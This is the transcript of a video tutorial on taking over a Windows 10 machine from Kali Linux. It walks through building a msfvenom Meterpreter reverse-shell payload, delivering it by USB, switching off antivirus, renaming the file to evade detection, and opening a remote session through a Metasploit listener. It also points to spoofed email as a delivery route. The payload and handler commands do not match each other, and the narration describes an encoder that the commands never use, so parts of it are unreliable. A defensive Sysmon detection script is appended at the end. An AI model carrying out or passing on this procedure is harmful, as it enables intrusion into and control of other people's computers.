System Hacking Windows 10 for Kali Linux

System Hacking Windows 10


Hi everyone and welcome back. And now let us finally exploit our Windows 10 machine. So, first of all, we created the payload with this command here. We encoded it with this encoder here on five iterations. We named it example.exe. The LHOST that we specified, let me just close this, is our IP address, and the LPORT is 4444. So, what we want to do right now is deliver this payload to our victim. Now for the first time, we will do that over a USB drive, which is the easiest and most simple. Now for this attack to work, you must have physical access to the victim's PC. Later on I will show you how you can do that over email, and how you can spoof fake emails and send them to anyone you want with the actual payload. So, first of all, what you want to do is plug your USB stick into your PC. So plug it in. Let me just... Okay. So my USB drive is plugged in. But you will notice that it will be detected on your main PC. Now in order for you to detect it on the Kali Linux machine, what you want to do is go onto the devices here. So click on the devices, go to the USB, and here you want to find your USB drive. So for me this is the Kingston DataTraveler 3.0. And if you click on it you will see, if you go once again here, that now it is connected to your Kali Linux machine.


Commands used in this article:

Find your IP address using "ip addr" or "ifconfig".

Create the payload: msfvenom -p windows/meterpreter/reverse_tcp -a x86 --platform windows -f exe LHOST=192.168.1.4 LPORT=4444 -o /root/Desktop/example.exe

Start Metasploit using the command "msfconsole".

Select the handler using the command "use multi/handler".

Set the payload using the command "set payload windows/meterpreter/reverse_tcp".

Set the options using "set LHOST 192.168.1.4" and "set LPORT 4444".

Once done, type "run" or "exploit" and press Enter.


So, in order for you to actually use it this should pop up, and you just click on open with files, and it will open your Kali Linux drive. Excuse me, your USB drive. And all you want to do from there is basically copy your example.exe or your payload, however you named it, to your USB drive. And basically paste it into the USB. So my payload is in the root directory. So if I just type here in the root directory, let me just delete the other two. So reverse.exe we don't need, and shell.exe we don't need. So, we only need to copy the example.exe which is our final payload. So let us do that by using the cp function in terminal, and then we specify the file which is example.exe. And where we want it to go is media/root, and then tab it to select your Kali Linux drive. Now if you don't want to copy it like this, you can basically go to the applications or, excuse me, to the places. Then you want to go to the computer. Then basically find your root directory. So let me just find it, root directory. Just click copy here, and you can paste it here. And that is how you can paste the file. Or you can use this command here. So basically what you want to do after this, so media/root, just press the tab button here, and it automatically selects the drive if you only have one USB drive plugged in, which you most likely do.

So, we won't run this since I already copied it. What we want to do right now is just click here on this arrow to unmount the USB. After that, let me just close all of this. And what I want to do right now is unplug it from my Kali Linux machine. So click here, and right now it will be plugged into my Windows 10 machine. So what I want to do is copy and paste this file on my desktop, or wherever you basically want. You need to give administrator permission. So we copy the file... but let me see. Why does it not want to? Okay. So, first thing. So this will happen. So, the first thing that you want to do basically is, first of all let me just delete it since this won't work. The reason why is, first of all, you need to disable two things since this is a well-known payload. You need to disable your antivirus if you have it. So for me that is Bitdefender.


I will just click on it, so this is my antivirus, you open your antivirus, and what you want to do is basically turn off the protection for it. So right now I will be able to move my virus without it getting deleted, since my device is at risk. Now you will do the same with your antivirus, and you also need to do the same with Windows Defender. Now I already had that turned off, so let me just repeat the process. I will do it real fast. So, cp example.exe into media/root and then Kali drive. So now I want to change my directory. As we can see, the file was deleted since it was detected as a Trojan, as we can see here. That is why I could not run the file or copy it to the desktop. But right now if I go to my Kali Linux drive and I use the, let me just rename the file to shell.exe so it isn't named example.exe. And we want to do the same thing as the previous time, so unmount the USB drive. So uncheck it here.

Now let's try to copy the file once again. So now as you can see it works, so the file is here. We don't need this USB drive anymore, or we will just leave it. It doesn't really matter. And the next thing you want to do before you actually run this file is start up your listener. Now, let me change my directory to root and run msfconsole. So, as I said, you need to use your LHOST IP address and your LPORT that you specified in the actual payload. Now one more thing to note is that you don't need to deliver the payload on the USB drive, you can also download it over Apache2. But I found this simple. You can just start Apache2, then copy the payload into the /var/www/html folder, and just open up your IP address from the Windows 10 machine in the Google search bar, and just click on the file to download it. That is another way to do it. But we will do it over the USB drive now since we already did it. Now once you open the msfconsole, what you want to do is use exploit/multi/handler, and what you want to do is set the payload that you used in the process of creating the payload with msfvenom. Now we used Windows x64 meterpreter reverse TCP, so we need to set that payload as well. So set payload windows/x64/meterpreter/reverse_tcp. So the next thing, we want to show options and set our LHOST. Now our LHOST is .1.4 I believe. It has to be the same as in the payload specification. So, set LHOST 192.168.1.4. And right now, show options once again to double check everything: we have set windows/x64/meterpreter/reverse_tcp as the payload, our LPORT is the same as in the specification of our payload, and our LHOST is our IP address.
The only thing you need to do right now is type exploit. Now to run the exploit as a background process you can basically type exploit -j -z, and this is the process of listening in the background. So you can still execute commands. So show options and all of that instead of just waiting for the connection. Now to close that process you can just type jobs here and it will say that the jobs currently running are the exploit multi/handler, listening on this IP address here, and on this port. So, the only thing we need to do right now is actually open this file. Now, if you deliver this file over a USB drive, you can basically double click it and it will open. However, if you download the file from the Internet, or from Apache2, or through email, or through anything else, it will ask for permission to run it.

It will ask are you sure you want to run this file since it is a .exe file. It is an executable and it will do this for every executable you download over the internet. It will ask would you like to run it since it is an executable file. But since we delivered it over a USB, we can basically double click it and it will run for us. It will not ask anything else, and it will basically open. Now, if I go here to my Kali Linux machine, you will see that we got meterpreter session 1 opened on our local listening address to the Windows 10 machine, which is .1.3 on this port. So if I basically press enter here, in order for you to enter this session, since we are doing this for the first time, what you need to type in your Metasploit is basically sessions, and then it will show you all of the sessions that you currently have. Now right now we only have the session with our Windows 10 machine, since that is the only machine that we attacked at this moment.

In order for you to enter that session what you want to do, let me just clear this so you can see it better, you can see this ID number 1. So when you type sessions it will print out all of the sessions and you can see that the session ID is number 1. In order for you to enter it just type here session -i and then 1. Uh oh... I think it's sessions -i and then 1. OK, so we will just add s. So sessions -i and then 1, and we can see we successfully got our meterpreter shell open. Right now this is the first time, so what we want to do right now is basically run the help command. Since we don't know what we can run, the help command will print out all of our available options for the Metasploit framework Meterpreter shell. So, for example, to check who we are we can just type here getuid, and it will say that this is the user that we are right now. So, we will see that we are not the administrator, which we will fix in post-exploitation videos, where I will show you what else you can run, and how you can elevate privileges, how you can get passwords, how you can upload/download files, and what else you can do.

But for now this will be good. So, for example, if I type ifconfig, you will see that my IP address is 192.168.1.8 and it is also 192.168.1.3. Now you may be asking, how do I have two IP addresses? Well, that is because I have a wireless network interface and a cable interface on my Windows 10 machine. So I basically have two interfaces running and connected to the Internet right now. One of them, as you can see, is the wireless network adapter which is at .1.8, and the other one is basically over cable which is .1.3. So, this is the one. And you can also, for example, check some other commands... let me just type help so we can see what else we can run. I believe you can check the arp tables as well. So you just type here arp, yeah. There are a bunch of other commands, and a bunch of other modules, that we will also start running in the next video. But for now we just wanted to get the session opened, and I will continue showing you what you can do in the next video. So I hope I see you there and take care. Bye.
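
Seen from the defending side, the walkthrough above leaves a recognisable trace: a program started from the desktop or a USB drive that opens an outbound connection as soon as it runs. The following is an added example, not part of the original article, that correlates those two events; the event records are constructed samples shaped like Sysmon EventID 1 and 3, and the user name, process IDs, timestamps and 60-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed samples shaped like Sysmon EventID 1 (process create) and 3 (network connect).
EVENTS = [
    {"EventID": 1, "UtcTime": "2024-01-10 09:15:02", "ProcessId": 4120,
     "Image": r"C:\Users\alice\Desktop\shell.exe"},
    {"EventID": 3, "UtcTime": "2024-01-10 09:15:03", "ProcessId": 4120,
     "Initiated": True, "DestinationIp": "192.168.1.4", "DestinationPort": 4444},
    {"EventID": 1, "UtcTime": "2024-01-10 09:16:00", "ProcessId": 5200,
     "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe"},
    {"EventID": 3, "UtcTime": "2024-01-10 09:16:01", "ProcessId": 5200,
     "Initiated": True, "DestinationIp": "93.184.216.34", "DestinationPort": 443},
    {"EventID": 1, "UtcTime": "2024-01-10 09:20:00", "ProcessId": 6100,
     "Image": r"E:\example.exe"},  # started from removable media, never connects
]
WINDOW = timedelta(seconds=60)  # assumed: how soon after start a callback counts
USER_DIRS = re.compile(r"\\users\\[^\\]+\\(desktop|downloads|appdata\\local\\temp)\\")

def suspicious_location(image):
    """Return why an image path is unusual for a program, or None."""
    if image[:2].upper() != "C:":
        return "non-system drive (possibly removable media)"
    if USER_DIRS.match(image[2:].lower()):
        return "user-writable folder"
    return None

def find_callbacks(events):
    """Flag processes started from unusual paths that connect out within WINDOW.
    The port is reported, not tested: LPORT is whatever the file's sender chose."""
    started, alerts = {}, []
    for ev in sorted(events, key=lambda e: e["UtcTime"]):
        when = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
        pid = ev["ProcessId"]
        if ev["EventID"] == 1:
            reason = suspicious_location(ev["Image"])
            if reason:
                started[pid] = (when, ev["Image"], reason)
            else:
                started.pop(pid, None)  # PID reused by an ordinary program
        elif ev["EventID"] == 3 and ev.get("Initiated"):
            hit = started.get(pid)
            if hit and when - hit[0] <= WINDOW:
                alerts.append({"image": hit[1], "reason": hit[2],
                    "dest": f'{ev["DestinationIp"]}:{ev["DestinationPort"]}'})
    return alerts

if __name__ == "__main__":
    for alert in find_callbacks(EVENTS):
        print(alert)
```

A hit is a triage lead rather than a verdict, since installers run from a downloads folder also connect out shortly after starting.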



